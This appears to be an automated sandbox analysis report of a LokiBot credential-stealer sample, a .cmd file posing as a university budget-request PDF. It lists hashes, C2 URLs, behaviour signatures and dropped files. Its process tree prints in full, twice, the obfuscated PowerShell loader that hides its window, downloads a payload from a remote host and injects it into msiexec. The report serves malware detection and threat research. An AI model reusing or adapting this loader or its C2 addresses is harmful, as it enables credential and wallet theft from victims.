Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-10-2024 07:56

General

  • Target

    PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.cmd

  • Size

    6KB

  • MD5

    854644dfd3e32033434d0338404c9a8f

  • SHA1

    f693fd34cef102901ebf389fd346e4e27fcbac2f

  • SHA256

    09a3bb4be0a502684bd37135a9e2cbaa3ea0140a208af680f7019811b37d28d6

  • SHA512

    9b5d79c99bf7d6d4ceaae0729c8036536a4514ebf19e40cf7e3870bf47346228c0ae1d025974a6adf4407501fad7e3edec7d0076474f2690c88c3a59b812fec6

  • SSDEEP

    192:rO2ENM8I0pZCaTFhv8YvBsYtFHkbaBuvl0MzT+L9XNZ:8XI0CaTFl8kB3kbD1XIdZ

Malware Config

Extracted

Family

lokibot

C2

http://137.184.191.215/index.php/check.php?s=am9ntjjw

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "<#Fracturable Hirsuties Rumoring #>;$Ligningsafdelings='Foresprgselsskema';<#Afspndingsvelserne Mobcaps Crucis eroderendes Meditant Lavishment Analyseresultater #>;$Dodding=$host.PrivateData;If ($Dodding) {$Vidneforklaringer++;}function japaconin($tostavede){$Bossa=$Tvetydige+$tostavede.Length-$Vidneforklaringer; for( $Destabiliseringen73=5;$Destabiliseringen73 -lt $Bossa;$Destabiliseringen73+=6){$Afsendendes='Overexercising';$Vrdigheden+=$tostavede[$Destabiliseringen73];}$Vrdigheden;}function Undangered($Egernets){ & ($Cystocarcinoma) ($Egernets);}$Kollektivisering=japaconin 'Gru,pM.reseoRedenzKon uiTrut l Tvrbln nexaSalgs/Brev,5Fj rv.Antik0 Bete athi(PabulWBrugeiHushenShebadSleepoLungew DannsStor AcceN CallTUnfre Popul1Gratt0Plans. Star0Korsf;Tet,a TiktaWPulediAppronB.jle6Grall4 .anv;Insoo Dragox ska,6e.isk4Wind ; Spot GuldtrSa lyvBl st: Myop1Fiche2Optur1L,str.Tauto0 Folk) ygep LictoGPrciseArbe.cVsenskKnop.otilbe/P ima2Steno0Hansa1Parfo0Shaha0Actin1Taktr0 Oran1 Rets Pr emFCuddei L arrCarapeCarg f u,mao Ste,xungr /R.med1Agtso2Exper1Super.Coccy0Spell ';$Bestignings186=japaconin 'OvervUF rmssBirtaEDemonRHospi- Br rASlkniGDrivkeBr.chNUnavaTLambr ';$Pathogermic=japaconin ' DonahDynejtMu ettI hthpSt mtsUnl.n: ,ova/Kalli/UdpebdCatchrAreaeiDelirvRendeeUnif..UnobjgOpspooIntroo Ste,gAmidolStor e Flle.TilggcAfmaaoMiniamAzole/ TalluPlacecA ske? nulle evasxUnfirpTrykioViderr ,adit Lopp=dumpedBa kaoSurtawnonconHeadll .doroRadi aRu,kodritua&LandbiHusmadrudet= Pagr1 Afl,M egioc T atRAktiedPi etJudlgsuGaarea OppoSVagt WhalmsnGr ntP .ugt4,kyggLPeavi6Hens.uSkriv-Men.sMRelo TSolkuaFeltflNa nevPigenx denrDRespeJ SkemIM noehTem oyRut.cWddfdtTAnd.oxH drobSchisrSm ap ';$Urologis=japaconin 'Flage>Dit i ';$Cystocarcinoma=japaconin 'SofapiJ.rdaEQui qx Kont ';$Lignocellulosic='Rigsdaler';$Pawnages='\Klinkerne66.Syn';Undangered (japaconin ' Smmo$delikgForrelPungeo F.rbbHejseasimpllDagdr:DownwGOverspAarssaHeelpdAtomv=Bro.s$ParteeT rcenBiotivSmaas: Ste aLs btpOve hpunsumd L.eraM thrtTrappaHarmo+Irise$Fre sPNonscaEcon,w DevanMas iaPrimagAfv.neReallsO slu ');Undangered (japaconin 'Etape$ LuthgRetsll A tioAfmnsbEnk laBe zolMiste: AgtsF.anocaFiberiSextil SurdiNectanBlegegRkkerlDazz.ySuper=Micro$OracuPKro eaTu tltN ttehSy.meoSerpeg.kabeeS ovbrCiga m odeliudla cExcus. WondsFar.ipMirf,lBismai UdmatSubma(Gir l$SkilnUTa etrOve.to De al SanioG bligConspi NazisTranq)Delgh ');Undangered (japaconin ' Hid [ProflN Ketye eleptAion .O spoSAnimaeBistrrZooecvForspiLappec Ple e TiaaPSpeciobrikeiS,aghnPagantBib lMArteraAds.rnMelloaKongeg etume Nea.rMisdo]Trskr:Coffl: rhopSbenpieBenedcS miju Nyvar H.psiUndert.belayMaterP .sycrNonheoGassetLaskeo DomkcMaskioKrimilGoodi Un,er= Ofre Belem[Disn N rboreEkspet,uper.BlindSKangae MaalcPacifuFl shrNas.oiPretetphorayanstiP disnrBlackoBrah.tKogleo Sextc Stofo sc elMegapTEcd sy Oratp InteeLesot]Tilen:Un da:CurlyTAmortlAfdamsGrafi1 Hys.2 Horn ');$Pathogermic=$Failingly[0];$salerno=(japaconin 'Blaar$ romoGBirdeL FragO Noneb LeptaPibleLLifeb:AriadP KlasR IritOUntaccbombahNiogtRUnsadofug,eM.jaltO ThymSnonstO NedpMProleE.aabe=He,opn OffeE BrndwSvan -Pro roMaterBPolynjbr nceCommoCKas utDefil SkibssMinesYResprsver,iTTri,heu jagMDetai. Hyphn Boree FrimtS att. Une WTriviebungeb UndecPr.uslChi iiRepatEU brinBetnktChapp ');Undangered ($salerno);Undangered (japaconin 'Vddel$Div.sPOplagr fennoOutsccResk,h Va erTullio ddimMa.rooR tinsBr atoBeklam CurreHelle.DelelHCathoewifisa phobd ogeaeSamstrSacchs Land[ Oste$ OpspBForsleBeredsSy.dit EkslibrissgProg nTetaniM.sdenJvnfrgSnowdsEr.ta1Klatt8Hensy6Domes] inte= Udri$PrediK TornoNuphal PanilIngraeCostiksygedtStivei pbakv gbakihlernsPho,oeObrazrNonasiBoblenvisumgLfteb ');$Retfrden=japaconin 'Nulvk$ DrmaPDriftrRevero EpercDer ahUnd.rrli,pioDoorcmprothoZik,usStunkoUforhmHold,e span.ButikD SkuloRomanwKom,onVaeggl BaadoLitteaPeri dproptFFo,aniPagnelAfledeEnjam(Lovpr$ExpecPTeletaFeltht AttehInvesoImbolgMannae .ullr FlocmSigneiklassc Spec,Tauro$ piriSstewauSmertbKomp.c Senal nogtaPerfes FressStiftiN.nthf RevaiTintecDenisaMegaftVol aiInforoBaandnSlant)Overs ';$Subclassification=$Gpad;Undangered (japaconin 'Malac$ Nut GPruttLFoli,oO.knaBRibosADeflaLKhotm:S ormM,atenaC yxsRPler,iAnv nAFirsaND adlaAand = Henv(ForsoTFolkeeKursuSDeconTAnt p- WhispEskadaBarduT FalsH impl Dagho$kyllis SproUsk.ttBkurtic,ubsil H.raaAvlensUnneuS ,yesiDeporFBedraiForkoCFaconaretarT OmeniJu,eso FrilNUnbea)Feni, ');while (!$Mariana) {Undangered (japaconin ' Exsa$Sekt,gcoupelD rtho.rinobChor aUu.dglRett :KonstN Li.neTercemPro omMatade Ag,esHepat=Udyrt$CaonatBhlanrRinc uFortaeUdste ') ;Undangered $Retfrden;Undangered (japaconin ' VuerSAn.abtAfprea ellerNondet lide-SkeltSHerpelRaadee rangeAvnslpBlanc Reuss4Rampe ');Undangered (japaconin ' buxe$F.gmagLnpotlSkovsoDio ab uno aSacrolFemte:OvervM Ba.raSto mrIotasi P ofaJuta.nOversaDemol= ngio(UdkasT Rubreelastslede tCorop-LiderP DeoxaBandltFl rehEquis Appen$ Ba rSUnevouFrtekb ChamcAlloclOpva,aFuldrsEarthsTapa.iAndalfH stiiU osmcS,aniasem pt St liElasmoKausan,egne)Stear ') ;Undangered (japaconin ' Gali$SpeakgTottelvo.dsoFor.lb B,gka.pparlCayub: HundSFour.pKoncir Benai orkn Gardt,hemieGrimarGr sseLogopnArraksProg =Whe t$DiatogUdadglTons oEfterbTe,neaJo sllBusti:DesalBAmenda.ondirMegalyTu getarvoio SkulnMikroeStt.v+T stg+Afgif%Lito.$PackwFOut aaAud.tiA taclHel aiTrmasnMonotgVi enlsigniyUp ti.ba iscDanskoLeptous rivnIm ert,euda ') ;$Pathogermic=$Failingly[$Sprinterens];}$Ebonits=320275;$Autoradiogram=30210;Undangered (japaconin 'Frifi$ amowgWitsvlCedunopo sobNgsteac edilStakt:M lesmBrsteaBrevsgUnv na raqusHardciDvrgfnLodbreImprerLngdenu meeeNetsm Semim=Se,ue EddeG InteeLun.ntOu fo-CoralCKons,oExon nph setmiaoueVo itn SkattReac, erie$end.gSSomnauOpga bHumo c Co.olR slaaAeonis Stu sL.keriFremhf Uddei,iraccAffotaAutoctGe neiCoaxaoFalisnTask ');Undangered (japaconin 'sha o$Jur tgnonpelGlittoSoeskbDampra oldelSmall:Cath WForfliAp,rilNa nil KludiStatsneksp gJarrisMercu Longs=Nonsp Kajep[AmmioS Reh,yEp.sus,anontreg le Coitm .ict. BuffC ,oruoGaffen FordvKloakePointrKonfitin ea]Rhin :Smoul: SubvF.emocrHarleoblomsmAminoBForteaDougisLimniePauci6epuli4TiltuSFoulat St rr B,chiUndernTermigSenus(Brac $TankbmSemita nthgZephya C,shsheteriProc nDeigneTr isr ompanBereleDewed)Munda ');Undangered (japaconin 'Opsig$Sh erg PopulNaupao verrbGte.la Tolkl.euko:.eaneEPretruMidsorP risifolkedStolpyLoulocPenise.ssen Beehi=Lgebe G nla[Ba rsS NybryNonapsRetsktWea,ae GalsmMissi.NonspTRotfme AncyxRewrat Swal.EkstrESclernContrcFaareo ValgdGabriiKakapnNotesgNauru]Zocco: arsh:SwadeAYoungSOccipCin,omI StorI Civ . ManoG ForueSh pmtB.utiSAns rtFil tr Sko i Sa,vnB.mahgSangf(Salsd$Bums WJobnaiSlutbl WhitlUnderi LeginDim sgRemigs affl)Super ');Undangered (japaconin 'Fisk $Pacemg,ubpelRump oWestfbForgraOutrelFrekv:slaaefUnq,aj TaklrFakultVundne rawndOverpeUnfo.sHunke=Indis$StudeEUdst,uSttterUafhniRodsad ottySe,iecMar he Harm. KardsInt nuTinfobSmuglsLi petelegirOmdiriNon nn latig Ruc (Retfr$VerdiEroe tbTurnao SjlenElecti,orsatfete,sClow ,Laval$ApartA PekeuW,enitGastroudfrtrUnidoa etald Finmi BelloRddikg At mrBygniaNi hem der) Arbe ');Undangered $fjrtedes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1288
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Fracturable Hirsuties Rumoring #>;$Ligningsafdelings='Foresprgselsskema';<#Afspndingsvelserne Mobcaps Crucis eroderendes Meditant Lavishment Analyseresultater #>;$Dodding=$host.PrivateData;If ($Dodding) {$Vidneforklaringer++;}function japaconin($tostavede){$Bossa=$Tvetydige+$tostavede.Length-$Vidneforklaringer; for( $Destabiliseringen73=5;$Destabiliseringen73 -lt $Bossa;$Destabiliseringen73+=6){$Afsendendes='Overexercising';$Vrdigheden+=$tostavede[$Destabiliseringen73];}$Vrdigheden;}function Undangered($Egernets){ & ($Cystocarcinoma) ($Egernets);}$Kollektivisering=japaconin 'Gru,pM.reseoRedenzKon uiTrut l Tvrbln nexaSalgs/Brev,5Fj rv.Antik0 Bete athi(PabulWBrugeiHushenShebadSleepoLungew DannsStor AcceN CallTUnfre Popul1Gratt0Plans. Star0Korsf;Tet,a TiktaWPulediAppronB.jle6Grall4 .anv;Insoo Dragox ska,6e.isk4Wind ; Spot GuldtrSa lyvBl st: Myop1Fiche2Optur1L,str.Tauto0 Folk) ygep LictoGPrciseArbe.cVsenskKnop.otilbe/P ima2Steno0Hansa1Parfo0Shaha0Actin1Taktr0 Oran1 Rets Pr emFCuddei L arrCarapeCarg f u,mao Ste,xungr /R.med1Agtso2Exper1Super.Coccy0Spell ';$Bestignings186=japaconin 'OvervUF rmssBirtaEDemonRHospi- Br rASlkniGDrivkeBr.chNUnavaTLambr ';$Pathogermic=japaconin ' DonahDynejtMu ettI hthpSt mtsUnl.n: ,ova/Kalli/UdpebdCatchrAreaeiDelirvRendeeUnif..UnobjgOpspooIntroo Ste,gAmidolStor e Flle.TilggcAfmaaoMiniamAzole/ TalluPlacecA ske? nulle evasxUnfirpTrykioViderr ,adit Lopp=dumpedBa kaoSurtawnonconHeadll .doroRadi aRu,kodritua&LandbiHusmadrudet= Pagr1 Afl,M egioc T atRAktiedPi etJudlgsuGaarea OppoSVagt WhalmsnGr ntP .ugt4,kyggLPeavi6Hens.uSkriv-Men.sMRelo TSolkuaFeltflNa nevPigenx denrDRespeJ SkemIM noehTem oyRut.cWddfdtTAnd.oxH drobSchisrSm ap ';$Urologis=japaconin 'Flage>Dit i ';$Cystocarcinoma=japaconin 'SofapiJ.rdaEQui qx Kont ';$Lignocellulosic='Rigsdaler';$Pawnages='\Klinkerne66.Syn';Undangered (japaconin ' Smmo$delikgForrelPungeo F.rbbHejseasimpllDagdr:DownwGOverspAarssaHeelpdAtomv=Bro.s$ParteeT rcenBiotivSmaas: Ste aLs btpOve hpunsumd L.eraM thrtTrappaHarmo+Irise$Fre sPNonscaEcon,w DevanMas iaPrimagAfv.neReallsO slu ');Undangered (japaconin 'Etape$ LuthgRetsll A tioAfmnsbEnk laBe zolMiste: AgtsF.anocaFiberiSextil SurdiNectanBlegegRkkerlDazz.ySuper=Micro$OracuPKro eaTu tltN ttehSy.meoSerpeg.kabeeS ovbrCiga m odeliudla cExcus. WondsFar.ipMirf,lBismai UdmatSubma(Gir l$SkilnUTa etrOve.to De al SanioG bligConspi NazisTranq)Delgh ');Undangered (japaconin ' Hid [ProflN Ketye eleptAion .O spoSAnimaeBistrrZooecvForspiLappec Ple e TiaaPSpeciobrikeiS,aghnPagantBib lMArteraAds.rnMelloaKongeg etume Nea.rMisdo]Trskr:Coffl: rhopSbenpieBenedcS miju Nyvar H.psiUndert.belayMaterP .sycrNonheoGassetLaskeo DomkcMaskioKrimilGoodi Un,er= Ofre Belem[Disn N rboreEkspet,uper.BlindSKangae MaalcPacifuFl shrNas.oiPretetphorayanstiP disnrBlackoBrah.tKogleo Sextc Stofo sc elMegapTEcd sy Oratp InteeLesot]Tilen:Un da:CurlyTAmortlAfdamsGrafi1 Hys.2 Horn ');$Pathogermic=$Failingly[0];$salerno=(japaconin 'Blaar$ romoGBirdeL FragO Noneb LeptaPibleLLifeb:AriadP KlasR IritOUntaccbombahNiogtRUnsadofug,eM.jaltO ThymSnonstO NedpMProleE.aabe=He,opn OffeE BrndwSvan -Pro roMaterBPolynjbr nceCommoCKas utDefil SkibssMinesYResprsver,iTTri,heu jagMDetai. Hyphn Boree FrimtS att. Une WTriviebungeb UndecPr.uslChi iiRepatEU brinBetnktChapp ');Undangered ($salerno);Undangered (japaconin 'Vddel$Div.sPOplagr fennoOutsccResk,h Va erTullio ddimMa.rooR tinsBr atoBeklam CurreHelle.DelelHCathoewifisa phobd ogeaeSamstrSacchs Land[ Oste$ OpspBForsleBeredsSy.dit EkslibrissgProg nTetaniM.sdenJvnfrgSnowdsEr.ta1Klatt8Hensy6Domes] inte= Udri$PrediK TornoNuphal PanilIngraeCostiksygedtStivei pbakv gbakihlernsPho,oeObrazrNonasiBoblenvisumgLfteb ');$Retfrden=japaconin 'Nulvk$ DrmaPDriftrRevero EpercDer ahUnd.rrli,pioDoorcmprothoZik,usStunkoUforhmHold,e span.ButikD SkuloRomanwKom,onVaeggl BaadoLitteaPeri dproptFFo,aniPagnelAfledeEnjam(Lovpr$ExpecPTeletaFeltht AttehInvesoImbolgMannae .ullr FlocmSigneiklassc Spec,Tauro$ piriSstewauSmertbKomp.c Senal nogtaPerfes FressStiftiN.nthf RevaiTintecDenisaMegaftVol aiInforoBaandnSlant)Overs ';$Subclassification=$Gpad;Undangered (japaconin 'Malac$ Nut GPruttLFoli,oO.knaBRibosADeflaLKhotm:S ormM,atenaC yxsRPler,iAnv nAFirsaND adlaAand = Henv(ForsoTFolkeeKursuSDeconTAnt p- WhispEskadaBarduT FalsH impl Dagho$kyllis SproUsk.ttBkurtic,ubsil H.raaAvlensUnneuS ,yesiDeporFBedraiForkoCFaconaretarT OmeniJu,eso FrilNUnbea)Feni, ');while (!$Mariana) {Undangered (japaconin ' Exsa$Sekt,gcoupelD rtho.rinobChor aUu.dglRett :KonstN Li.neTercemPro omMatade Ag,esHepat=Udyrt$CaonatBhlanrRinc uFortaeUdste ') ;Undangered $Retfrden;Undangered (japaconin ' VuerSAn.abtAfprea ellerNondet lide-SkeltSHerpelRaadee rangeAvnslpBlanc Reuss4Rampe ');Undangered (japaconin ' buxe$F.gmagLnpotlSkovsoDio ab uno aSacrolFemte:OvervM Ba.raSto mrIotasi P ofaJuta.nOversaDemol= ngio(UdkasT Rubreelastslede tCorop-LiderP DeoxaBandltFl rehEquis Appen$ Ba rSUnevouFrtekb ChamcAlloclOpva,aFuldrsEarthsTapa.iAndalfH stiiU osmcS,aniasem pt St liElasmoKausan,egne)Stear ') ;Undangered (japaconin ' Gali$SpeakgTottelvo.dsoFor.lb B,gka.pparlCayub: HundSFour.pKoncir Benai orkn Gardt,hemieGrimarGr sseLogopnArraksProg =Whe t$DiatogUdadglTons oEfterbTe,neaJo sllBusti:DesalBAmenda.ondirMegalyTu getarvoio SkulnMikroeStt.v+T stg+Afgif%Lito.$PackwFOut aaAud.tiA taclHel aiTrmasnMonotgVi enlsigniyUp ti.ba iscDanskoLeptous rivnIm ert,euda ') ;$Pathogermic=$Failingly[$Sprinterens];}$Ebonits=320275;$Autoradiogram=30210;Undangered (japaconin 'Frifi$ amowgWitsvlCedunopo sobNgsteac edilStakt:M lesmBrsteaBrevsgUnv na raqusHardciDvrgfnLodbreImprerLngdenu meeeNetsm Semim=Se,ue EddeG InteeLun.ntOu fo-CoralCKons,oExon nph setmiaoueVo itn SkattReac, erie$end.gSSomnauOpga bHumo c Co.olR slaaAeonis Stu sL.keriFremhf Uddei,iraccAffotaAutoctGe neiCoaxaoFalisnTask ');Undangered (japaconin 'sha o$Jur tgnonpelGlittoSoeskbDampra oldelSmall:Cath WForfliAp,rilNa nil KludiStatsneksp gJarrisMercu Longs=Nonsp Kajep[AmmioS Reh,yEp.sus,anontreg le Coitm .ict. BuffC ,oruoGaffen FordvKloakePointrKonfitin ea]Rhin :Smoul: SubvF.emocrHarleoblomsmAminoBForteaDougisLimniePauci6epuli4TiltuSFoulat St rr B,chiUndernTermigSenus(Brac $TankbmSemita nthgZephya C,shsheteriProc nDeigneTr isr ompanBereleDewed)Munda ');Undangered (japaconin 'Opsig$Sh erg PopulNaupao verrbGte.la Tolkl.euko:.eaneEPretruMidsorP risifolkedStolpyLoulocPenise.ssen Beehi=Lgebe G nla[Ba rsS NybryNonapsRetsktWea,ae GalsmMissi.NonspTRotfme AncyxRewrat Swal.EkstrESclernContrcFaareo ValgdGabriiKakapnNotesgNauru]Zocco: arsh:SwadeAYoungSOccipCin,omI StorI Civ . ManoG ForueSh pmtB.utiSAns rtFil tr Sko i Sa,vnB.mahgSangf(Salsd$Bums WJobnaiSlutbl WhitlUnderi LeginDim sgRemigs affl)Super ');Undangered (japaconin 'Fisk $Pacemg,ubpelRump oWestfbForgraOutrelFrekv:slaaefUnq,aj TaklrFakultVundne rawndOverpeUnfo.sHunke=Indis$StudeEUdst,uSttterUafhniRodsad ottySe,iecMar he Harm. KardsInt nuTinfobSmuglsLi petelegirOmdiriNon nn latig Ruc (Retfr$VerdiEroe tbTurnao SjlenElecti,orsatfete,sClow ,Laval$ApartA PekeuW,enitGastroudfrtrUnidoa etald Finmi BelloRddikg At mrBygniaNi hem der) Arbe ');Undangered $fjrtedes;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2440
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:1176

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    71444def27770d9071039d005d0323b7

    SHA1

    cef8654e95495786ac9347494f4417819373427e

    SHA256

    8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

    SHA512

    a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lz3nycdv.2vv.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Klinkerne66.Syn

    Filesize

    456KB

    MD5

    46d8386ae55aedb99c64364e7c99e8b0

    SHA1

    6962f68c2ad1faaef3b9f21e6c83cd2c6d9df148

    SHA256

    b8083d232543db2f2ad140965d7599774276b6bac6e2a631ab53ea25ac6e8e16

    SHA512

    bd07fbe31e85c59f6d395fdb22b9c43952373630a0c514689955bcc2e851e1be6633b2113db9bf02d848ba24a04fd8db5a6affafc55a8c390a4813d65536cb9f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-656926755-4116854191-210765258-1000\0f5007522459c86e95ffcc62f32308f1_6f95b8b4-c02b-43c9-8cd4-016780936b63

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-656926755-4116854191-210765258-1000\0f5007522459c86e95ffcc62f32308f1_6f95b8b4-c02b-43c9-8cd4-016780936b63

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • memory/1176-73-0x0000000000400000-0x00000000005E4000-memory.dmp

    Filesize

    1.9MB

  • memory/1176-77-0x0000000000400000-0x00000000005E4000-memory.dmp

    Filesize

    1.9MB

  • memory/1288-14-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

    Filesize

    10.8MB

  • memory/1288-20-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

    Filesize

    10.8MB

  • memory/1288-24-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

    Filesize

    10.8MB

  • memory/1288-23-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

    Filesize

    10.8MB

  • memory/1288-19-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

    Filesize

    10.8MB

  • memory/1288-18-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

    Filesize

    10.8MB

  • memory/1288-17-0x00007FFA6BAC3000-0x00007FFA6BAC5000-memory.dmp

    Filesize

    8KB

  • memory/1288-13-0x00007FFA6BAC0000-0x00007FFA6C581000-memory.dmp

    Filesize

    10.8MB

  • memory/1288-8-0x000002D7A55B0000-0x000002D7A55D2000-memory.dmp

    Filesize

    136KB

  • memory/1288-2-0x00007FFA6BAC3000-0x00007FFA6BAC5000-memory.dmp

    Filesize

    8KB

  • memory/2440-45-0x0000000007E00000-0x000000000847A000-memory.dmp

    Filesize

    6.5MB

  • memory/2440-53-0x00000000750E0000-0x0000000075890000-memory.dmp

    Filesize

    7.7MB

  • memory/2440-31-0x00000000061B0000-0x0000000006216000-memory.dmp

    Filesize

    408KB

  • memory/2440-43-0x00000000067B0000-0x00000000067CE000-memory.dmp

    Filesize

    120KB

  • memory/2440-44-0x00000000069A0000-0x00000000069EC000-memory.dmp

    Filesize

    304KB

  • memory/2440-30-0x00000000060D0000-0x0000000006136000-memory.dmp

    Filesize

    408KB

  • memory/2440-46-0x0000000006D50000-0x0000000006D6A000-memory.dmp

    Filesize

    104KB

  • memory/2440-47-0x0000000007A20000-0x0000000007AB6000-memory.dmp

    Filesize

    600KB

  • memory/2440-48-0x00000000079C0000-0x00000000079E2000-memory.dmp

    Filesize

    136KB

  • memory/2440-49-0x0000000008A30000-0x0000000008FD4000-memory.dmp

    Filesize

    5.6MB

  • memory/2440-29-0x00000000057E0000-0x0000000005802000-memory.dmp

    Filesize

    136KB

  • memory/2440-51-0x00000000750E0000-0x0000000075890000-memory.dmp

    Filesize

    7.7MB

  • memory/2440-52-0x00000000750E0000-0x0000000075890000-memory.dmp

    Filesize

    7.7MB

  • memory/2440-41-0x0000000006320000-0x0000000006674000-memory.dmp

    Filesize

    3.3MB

  • memory/2440-54-0x00000000750E0000-0x0000000075890000-memory.dmp

    Filesize

    7.7MB

  • memory/2440-56-0x00000000750E0000-0x0000000075890000-memory.dmp

    Filesize

    7.7MB

  • memory/2440-55-0x00000000750EE000-0x00000000750EF000-memory.dmp

    Filesize

    4KB

  • memory/2440-57-0x00000000750E0000-0x0000000075890000-memory.dmp

    Filesize

    7.7MB

  • memory/2440-58-0x0000000008FE0000-0x000000000D3D6000-memory.dmp

    Filesize

    68.0MB

  • memory/2440-59-0x00000000750E0000-0x0000000075890000-memory.dmp

    Filesize

    7.7MB

  • memory/2440-60-0x00000000750E0000-0x0000000075890000-memory.dmp

    Filesize

    7.7MB

  • memory/2440-61-0x00000000750E0000-0x0000000075890000-memory.dmp

    Filesize

    7.7MB

  • memory/2440-63-0x00000000750E0000-0x0000000075890000-memory.dmp

    Filesize

    7.7MB

  • memory/2440-28-0x0000000005AA0000-0x00000000060C8000-memory.dmp

    Filesize

    6.2MB

  • memory/2440-27-0x00000000750E0000-0x0000000075890000-memory.dmp

    Filesize

    7.7MB

  • memory/2440-26-0x0000000002E90000-0x0000000002EC6000-memory.dmp

    Filesize

    216KB

  • memory/2440-25-0x00000000750EE000-0x00000000750EF000-memory.dmp

    Filesize

    4KB